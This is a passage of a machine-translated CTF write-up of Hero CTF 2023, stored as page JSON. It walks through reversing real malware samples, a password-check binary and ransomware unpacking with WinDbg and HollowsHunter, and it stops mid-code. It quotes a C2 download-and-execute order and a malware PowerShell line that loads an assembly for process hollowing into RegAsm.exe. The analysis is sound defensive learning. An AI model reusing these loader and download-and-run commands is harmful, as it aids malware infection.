{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-heroctf-2023-en","result":{"data":{"markdownRemark":{"id":"8eb407e0-41f8-5a0f-bbbb-5d9c7d0f3594","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-heroctf-2023\">original page</a>.</p>\n</blockquote>\n<p>I participated in Hero CTF 2023, which started on 5/13, as 0nePadding.</p>\n<p>My final placement was 84th out of 1085 teams.</p>\n<p>Hero CTF was a fairly unusual CTF: almost every Reverse challenge involved handling real malware samples.</p>\n<p>It was a very intense and fun CTF, so as usual I’m writing up the challenges I learned from.</p>\n<h2 id=\"table-of-contents\" style=\"position:relative;\">Table of Contents</h2>\n<ul>\n<li><a href=\"#give-my-money-backrev\">Give My Money Back(Rev)</a></li>\n<li><a href=\"#scarfacerev\">Scarface(Rev)</a></li>\n<li>\n<p><a href=\"#infexionrev\">InfeXion(Rev)</a></p>\n<ul>\n<li><a href=\"#task1\">Task1</a></li>\n<li><a href=\"#task2\">Task2</a></li>\n<li><a href=\"#task3\">Task3</a></li>\n<li><a href=\"#task4\">Task4</a></li>\n</ul>\n</li>\n<li><a href=\"#hero-ransomrev\">Hero Ransom(Rev)</a></li>\n<li>\n<p><a href=\"#devcorpforensic\">dev.corp(Forensic)</a></p>\n<ul>\n<li><a href=\"#task1-1\">Task1</a></li>\n</ul>\n</li>\n<li><a href=\"#heapforensic\">Heap(Forensic)</a></li>\n<li><a href=\"#windows-stands-for-loserforensic\">Windows Stands For Loser(Forensic)</a></li>\n<li><a href=\"#openpirateosint\">OpenPirate(OSINT)</a></li>\n<li><a href=\"#pdf-messstego\">PDF-Mess(Stego)</a></li>\n<li><a href=\"#png-gstego\">PNG-G(Stego)</a></li>\n<li><a href=\"#subliminalstego\">Subliminal(Stego)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"give-my-money-backrev\" style=\"position:relative;\">Give My Money Back(Rev)</h2>\n<blockquote>\n<p>Joel sat at his desk, staring at the computer screen in front of her. She had just received a strange email from an unknown sender. Joel was intrigued. She hesitated for a moment, wondering if she should open the email or not. But her curiosity got the best of her, and she clicked on the message. Your goal is to help Joel find out who stole her money!</p>\n<p>Warning : The attached archive contains real malware, do not run it on your machine! Archive password: infected</p>\n<p>The flag corresponds to the email used for the exfiltration and the name of the last exfiltrated file, e.g.
Hero{attacker@evil.com|passwords.txt}.</p>\n<p>Format : Hero{email|filename}\nAuthor : xanhacks</p>\n</blockquote>\n<p>The very first challenge already involved real malware.</p>\n<p>Reading the provided sample (a VBS file), it appeared to execute an obfuscated script.</p>\n<p>When I removed the <code class=\"language-text\">eval</code> step in my analysis environment and deobfuscated the script, I was able to obtain the plaintext of the code executed by the malware.</p>\n<p>From there, I recovered the attacker’s email address and the filename of the stolen confidential file, which together form the flag, and solved the challenge.</p>\n<h2 id=\"scarfacerev\" style=\"position:relative;\">Scarface(Rev)</h2>\n<blockquote>\n<p>Maybe you can find my password… But you can’t push it to the limit like me.</p>\n<p>Format : Hero{password}\nAuthor :
SoEasY</p>\n</blockquote>\n<p>This was a reversing challenge involving an ELF file rather than malware.</p>\n<p>Decompiling it with Ghidra gave the following <code class=\"language-text\">main</code> function.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined8 <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  uint uVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>__s<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">void</span> <span class=\"token operator\">*</span>pvVar2<span class=\"token punctuation\">;</span>\n  <span class=\"token class-name\">size_t</span> sVar3<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>__s_00<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> local_2c<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>local_28<span class=\"token punctuation\">;</span>\n  \n  __s <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token function\">malloc</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x40</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  pvVar2 <span class=\"token operator\">=</span> <span class=\"token function\">malloc</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x40</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Can you push it to the limit ? \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">,</span><span class=\"token number\">0x3f</span><span class=\"token punctuation\">,</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  sVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strcspn</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">,</span><span class=\"token string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  __s<span class=\"token punctuation\">[</span>sVar3<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token char\">'\\0'</span><span class=\"token punctuation\">;</span>\n  sVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>sVar3 <span class=\"token operator\">!=</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>local_28 <span class=\"token operator\">=</span> <span class=\"token 
string\">\"https://www.youtube.com/watch?v=Olgn9sXNdl0\"</span><span class=\"token punctuation\">;</span> <span class=\"token operator\">*</span>local_28 <span class=\"token operator\">!=</span> <span class=\"token char\">'='</span><span class=\"token punctuation\">;</span>\n      local_28 <span class=\"token operator\">=</span> local_28 <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token punctuation\">}</span>\n  __s_00 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token function\">UNO_REVERSE_CARD</span><span class=\"token punctuation\">(</span>local_28<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  sVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  uVar1 <span class=\"token operator\">=</span> <span class=\"token function\">decode</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">,</span>sVar3 <span class=\"token operator\">&amp;</span> <span class=\"token number\">0xffffffff</span><span class=\"token punctuation\">,</span>pvVar2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>local_2c <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> local_2c <span class=\"token operator\">&lt;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">;</span> local_2c <span class=\"token operator\">=</span> local_2c 
<span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>byte<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>__s<span class=\"token punctuation\">[</span>local_2c<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>byte <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span><span class=\"token punctuation\">)</span>pvVar2 <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span><span class=\"token punctuation\">)</span>local_2c <span class=\"token operator\">%</span> <span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span>uVar1<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span>\n        <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>DAT_00102050<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span>local_2c<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      <span class=\"token function\">fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token 
function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Well done! You can validate with the flag Hero{%s}\\n\"</span><span class=\"token punctuation\">,</span>__s<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"(And watch a last time this : %s)\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"https://www.youtube.com/watch?v=Olgn9sXNdl0\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The code is very simple: it accepts input with the same length as <code class=\"language-text\">https://www.youtube.com/watch?v</code> (0x1f) and validates it as a password.</p>\n<p>At this point, you can see that the values used for verification are generated by the following three lines.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">__s_00 <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token function\">UNO_REVERSE_CARD</span><span class=\"token punctuation\">(</span>local_28<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\nsVar3 <span class=\"token operator\">=</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>__s_00<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\nuVar1 <span class=\"token operator\">=</span> <span class=\"token function\">decode</span><span class=\"token 
punctuation\">(</span>__s_00<span class=\"token punctuation\">,</span>sVar3 <span class=\"token operator\">&amp;</span> <span class=\"token number\">0xffffffff</span><span class=\"token punctuation\">,</span>pvVar2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Looking at each step, none of them depend on the user’s input, and they always generate the same values.</p>\n<p>So I performed dynamic analysis with gdb, extracted the values of <code class=\"language-text\">pvVar2</code> and <code class=\"language-text\">uVar1</code>, and then used the following solver to recover the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#   __s_00 = (char *)UNO_REVERSE_CARD(i);</span>\n<span class=\"token comment\">#   sVar3 = strlen(__s_00);</span>\n<span class=\"token comment\">#   uVar1 = decode(__s_00,sVar3 &amp; 0xffffffff,pvVar2);</span>\n<span class=\"token comment\">#   for (j = 0; j &lt; 0x1f; j = j + 1) {</span>\n<span class=\"token comment\">#     if ((byte)(__s[j] ^ *(byte *)((long)pvVar2 + (ulong)(long)j % (ulong)uVar1)) !=</span>\n<span class=\"token comment\">#         (&amp;DAT_00402050)[j]) {</span>\n<span class=\"token comment\">#       fail();</span>\n<span class=\"token comment\">#     }</span>\n<span class=\"token comment\">#   }</span>\n\ns_00 <span class=\"token operator\">=</span> <span class=\"token string\">\"0ldNXs9nglO=\"</span>\nsVar3 <span class=\"token operator\">=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>s_00<span class=\"token punctuation\">)</span>\n\nuVar1 <span class=\"token operator\">=</span> <span class=\"token number\">0x8</span>\ndecode_map <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0xd2</span><span class=\"token punctuation\">,</span><span class=\"token 
number\">0x57</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x4d</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x5e</span><span class=\"token punctuation\">,</span><span class=\"token number\">0xcf</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x67</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x82</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x53</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x80</span><span class=\"token punctuation\">]</span>\nDAT_00402050 <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span> <span class=\"token number\">0x81</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x63</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x34</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x01</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x87</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x54</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xee</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xe2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x08</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x39</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x6e</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x90</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x0a</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xdb</span><span class=\"token punctuation\">,</span> <span class=\"token 
number\">0x0c</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xbe</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x66</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x39</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x2a</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa3</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x54</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xdd</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x15</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x80</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x66</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x7e</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x10</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x8b</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x46</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0xa3</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0x00</span> <span class=\"token punctuation\">]</span>\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">:</span>\n    flag <span class=\"token operator\">+=</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>DAT_00402050<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">^</span> decode_map<span class=\"token punctuation\">[</span>i<span class=\"token operator\">%</span><span class=\"token number\">8</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># S4y_H3lL0_t0_mY_l1ttl3_FR13ND!!</span></code></pre></div>\n<h2 id=\"infexionrev\" style=\"position:relative;\">InfeXion(Rev)</h2>\n<p>This was a series of challenges about analyzing real malware that had been observed recently.</p>\n<p>The challenge was released while the server the malware uses to download its second-stage sample was still alive.</p>\n<h3 id=\"task1\" style=\"position:relative;\">Task1</h3>\n<blockquote>\n<p>On 2023-04-29 10:10:07, we received the following order from a C2 server located on the domain {C2 URL}:</p>\n<p>{C2 URL}</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the malware family that sends this order, e.g. Hero{QAKBOT}.</p>\n<p>Format : Hero{malware-family}\nAuthor : xanhacks</p>\n</blockquote>\n<p>This challenge asked for the malware family whose C2 issues commands such as <code class=\"language-text\">down-n-exec|https://&lt;malware distribution server>/qk7kvg.VBS|qk7kvg.VBS</code>.</p>\n<p>I first thought it was STRRAT, but that was not correct, so I dug a little deeper and found the following article.</p>\n<p>Reference: <a href=\"https://www.uptycs.com/blog/wshrat-acting-as-a-dropper-for-agent-tesla\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Agent Tesla Malware Analysis: WSHRAT Acting as a Dropper</a></p>\n<p>That led me to the correct flag, <code class=\"language-text\">Hero{WSHRAT}</code>.</p>\n<h3 id=\"task2\" style=\"position:relative;\">Task2</h3>\n<blockquote>\n<p>A script named qk7kvg.VBS appears to have been executed on the victim’s machine. Find the next step in the infection chain!</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the URL and the Windows path of the downloaded file, e.g. Hero{https://dropbox.com/file/xyz|C:\\Windows\\Temp\\malware.exe}.</p>\n<p>Format : Hero{URL|FULL_PATH}\nAuthor : xanhacks</p>\n</blockquote>\n<p>In this task, the flag was the URL of the server distributing the second-stage sample, which is referenced in the <code class=\"language-text\">qk7kvg.VBS</code> sample retrieved from the C2.</p>\n<p>The URL was written in plaintext in the sample.</p>\n<h3 id=\"task3\" style=\"position:relative;\">Task3</h3>\n<blockquote>\n<p>A powershell script named vidyud.jpg appears to have been executed on the victim’s machine. Find the next step in the infection chain! How the first binary runs the second one?</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the name of technique and the method name for hiding the malicious process, e.g.
Hero{DLL Injection|mainMethod}.</p>\n<p>Format : Hero{Technique|Method name}\nAuthor : xanhacks</p>\n</blockquote>\n<p>Analyzing the second-stage sample downloaded by <code class=\"language-text\">qk7kvg.VBS</code>, I found that although it had a <code class=\"language-text\">.png</code> extension, the file actually contained an obfuscated PowerShell script.</p>\n<p>This script generates two binary files from obfuscated byte data.</p>\n<p>After deobfuscating it and saving the byte data as files, I was able to obtain the following two samples.</p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/d0043009211a1d48c601ad011eec26bfb01d56331fe2509a7422d2ed984089bf/detection\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - d0043009211a1d48c601ad011eec26bfb01d56331fe2509a7422d2ed984089bf</a></p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f/detection\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f</a></p>\n<p>Finally, the script runs the following PowerShell command, which loads sample A as an assembly and passes the bytes of sample B to one of its methods.</p>\n<div class=\"gatsby-highlight\" data-language=\"powershell\"><pre class=\"language-powershell\"><code class=\"language-powershell\"><span class=\"token punctuation\">[</span>Reflection.Assembly<span class=\"token punctuation\">]</span>::Load<span class=\"token punctuation\">(</span><span class=\"token variable\">$uiououououououououoououo</span><span class=\"token punctuation\">)</span>.GetType<span class=\"token punctuation\">(</span><span class=\"token string\">'Hhd95inlxpu7aiKwB3.Erc4ahc0TZJlqBWO9w'</span><span class=\"token punctuation\">)</span>.GetMethod<span class=\"token punctuation\">(</span><span class=\"token string\">'rdgUsOpw7'</span><span class=\"token punctuation\">)</span>.Invoke<span class=\"token punctuation\">(</span><span 
class=\"token variable\">$null</span>,<span class=\"token punctuation\">[</span>object<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">(</span><span class=\"token string\">'C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe'</span>,<span class=\"token variable\">$cbbzqwqwqqwqwwqw</span><span class=\"token punctuation\">))</span></code></pre></div>\n<p>Because it is loaded and executed with <code class=\"language-text\">[Reflection.Assembly]::Load</code>, we can tell that the data in <code class=\"language-text\">$uiououououououououoououo</code>, which holds sample A, is a .NET assembly.</p>\n<p>So I analyzed the extracted file with ILSpy, and by reading the method <code class=\"language-text\">rdgUsOpw7</code> in the class <code class=\"language-text\">Hhd95inlxpu7aiKwB3.Erc4ahc0TZJlqBWO9w</code>, the one selected by the <code class=\"language-text\">GetType</code> call, I was able to understand its behavior.</p>\n<p>In the end, the correct flag was Process Hollowing, the technique used to inject the code, together with <code class=\"language-text\">g8tOGbvTY</code>, the method called by <code class=\"language-text\">rdgUsOpw7</code>.</p>\n<h3 id=\"task4\" style=\"position:relative;\">Task4</h3>\n<blockquote>\n<p>The second binary seems to be the real malware! 
Extract its configuration.</p>\n<p>Warning : This series of challenges contains real world malware. Do not execute it on your host, use a VM !!</p>\n<p>The flag corresponds to the C2 protocol, host and port, e.g. Hero{smb|sub.example.com|9932}.</p>\n<p>Format : Hero{protocol|domain|port}\nAuthor : xanhacks</p>\n</blockquote>\n<p>This challenge was to identify the C2 destination and protocol used by the second sample.</p>\n<p>Here, I was able to determine the flag simply from the VirusTotal behavior report as it was.</p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f/behavior\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - ecae6a842a9d1e85254965536628840d2dd28145db57e32d821b10ec9744ba8f</a></p>\n<h2 id=\"hero-ransomrev\" style=\"position:relative;\">Hero Ransom(Rev)</h2>\n<blockquote>\n<p>The mission of analyzing this malware is given to you in order to recover an encrypted file.</p>\n<p>Do not run the malware on your host machine.</p>\n<p>Format : Hero{flag}\nAuthors : SoEasY &#x26; Log_s</p>\n</blockquote>\n<p>You are given a ransomware sample with the following hash.</p>\n<p>Reference: <a href=\"https://www.virustotal.com/gui/file/fb0d5f066ee85b307b6bf83c8cf88699cac719c35637a4b74b2760c16bc805b9/detection\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">VirusTotal - File - fb0d5f066ee85b307b6bf83c8cf88699cac719c35637a4b74b2760c16bc805b9</a></p>\n<p>After looking through the <code class=\"language-text\">main</code> function decompiled in Ghidra, I focused on the following line.</p>\n<p><span class=\"gatsby-resp-image-wrapper\"><a class=\"gatsby-resp-image-link\" href=\"/static/cf958d545176824409bbe4198b4e0993/11a8f/image-20230516182857634.png\" target=\"_blank\" rel=\"noopener\"><img class=\"gatsby-resp-image-image\" src=\"/static/cf958d545176824409bbe4198b4e0993/d9199/image-20230516182857634.png\" alt=\"image-20230516182857634\" title=\"image-20230516182857634\" loading=\"lazy\" /></a></span></p>\n<p>It seemed to be calling an address stored in a register.</p>\n<p>When I set a breakpoint at this point in WinDbg and followed the execution, it allocated stack space and then called <code class=\"language-text\">0x2a7c4d28cec</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> bp hero_ransom+0x1c04\n\n<span class=\"token operator\">></span> u @rcx L2\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28238 4883ec28        sub     rsp,28h\n000002a7<span class=\"token variable\">`</span></span>c4d2823c e8ab0a0000      call    000002a7`c4d28cec</code></pre></div>\n<p>Code beginning with <code class=\"language-text\">4883ec28</code> (<code class=\"language-text\">sub rsp,28h</code>) looks like the prologue of a PE entry function.</p>\n<p>When I disassembled this call destination as well, it looked like ordinary code starting with a function prologue.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> uf 000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28cec\n000002a7<span class=\"token variable\">`</span></span>c4d28cec 48895c2420      mov     qword ptr <span class=\"token 
punctuation\">[</span>rsp+20h<span class=\"token punctuation\">]</span>,rbx\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28cf1 <span class=\"token number\">55</span>              push    rbp\n000002a7<span class=\"token variable\">`</span></span>c4d28cf2 488bec          mov     rbp,rsp\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28cf5 4883ec20        sub     rsp,20h\n000002a7<span class=\"token variable\">`</span></span>c4d28cf9 488b0510e50400  mov     rax,qword ptr <span class=\"token punctuation\">[</span>000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d77210<span class=\"token punctuation\">]</span>\n000002a7<span class=\"token variable\">`</span></span>c4d28d00 48bb32a2df2d992b0000 mov rbx,2B992DDFA232h\n000002a7<span class=\"token variable\"><span class=\"token variable\">`</span>c4d28d0a 483bc3          <span class=\"token function\">cmp</span>     rax,rbx\n000002a7<span class=\"token variable\">`</span></span>c4d28d0d <span class=\"token number\">7574</span>            jne     000002a7`c4d28d83  Branch\n<span class=\"token punctuation\">{</span><span class=\"token punctuation\">{</span> omitted <span class=\"token punctuation\">}</span><span class=\"token punctuation\">}</span></code></pre></div>\n<p>This function seems to have been decompressed from somewhere at runtime and expanded in memory, and it does not appear to be embedded in the original binary as raw bytes.</p>\n<p>After referring to the <a href=\"https://github.com/HeroCTF/HeroCTF_v5/tree/main/Reverse/HeroRansom\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Writeup</a>, I learned that a tool called HollowsHunter can be used to dump PE binaries expanded in memory like this.</p>\n<p>So I ran a memory scan with HollowsHunter, specifying the PID identified with the pseudo-register <code class=\"language-text\">$tpid</code>, and obtained a file named <code 
class=\"language-text\">2a7c4d00000.exe</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> ? <span class=\"token variable\">$tpid</span>\nEvaluate expression: <span class=\"token number\">2288</span> <span class=\"token operator\">=</span> 00000000`000008f0\n\n<span class=\"token operator\">></span>hollows_hunter64.exe /pid <span class=\"token number\">2288</span>\nHollowsHunter v.0.3.6 <span class=\"token punctuation\">(</span>x64<span class=\"token punctuation\">)</span>\nBuilt on: May <span class=\"token number\">14</span> <span class=\"token number\">2023</span>\n\nusing: PE-sieve v.0.3.6.0\n\n<span class=\"token operator\">>></span> Scanning PID: <span class=\"token number\">2288</span> <span class=\"token builtin class-name\">:</span> hero_ransom.exe\n<span class=\"token operator\">>></span> Detected: <span class=\"token number\">2288</span>\n--------\nSUMMARY:\nScan at: 05/16/23 <span class=\"token number\">12</span>:31:13 <span class=\"token punctuation\">(</span><span class=\"token number\">1684240273</span><span class=\"token punctuation\">)</span>\nFinished scan in: <span class=\"token number\">141</span> milliseconds\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Total scanned: <span class=\"token number\">1</span>\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Total suspicious: <span class=\"token number\">1</span>\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> List of suspicious:\n<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>: PID: <span class=\"token number\">2288</span>, Name: hero_ransom.exe</code></pre></div>\n<p>This matched the suspicious function-call code I had confirmed in the debugger.</p>\n<p>Next, I analyzed the dumped binary further 
with Ghidra.</p>\n<p>Looking at the <code class=\"language-text\">main</code> function, it was as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined8 <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  undefined local_28 <span class=\"token punctuation\">[</span><span class=\"token number\">16</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  undefined8 local_18<span class=\"token punctuation\">;</span>\n  undefined8 local_10<span class=\"token punctuation\">;</span>\n  \n  local_18 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  local_10 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  local_28 <span class=\"token operator\">=</span> <span class=\"token function\">ZEXT816</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">func1</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">undefined</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span><span class=\"token number\">32</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>local_28<span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span><span class=\"token function\">undefined</span> <span 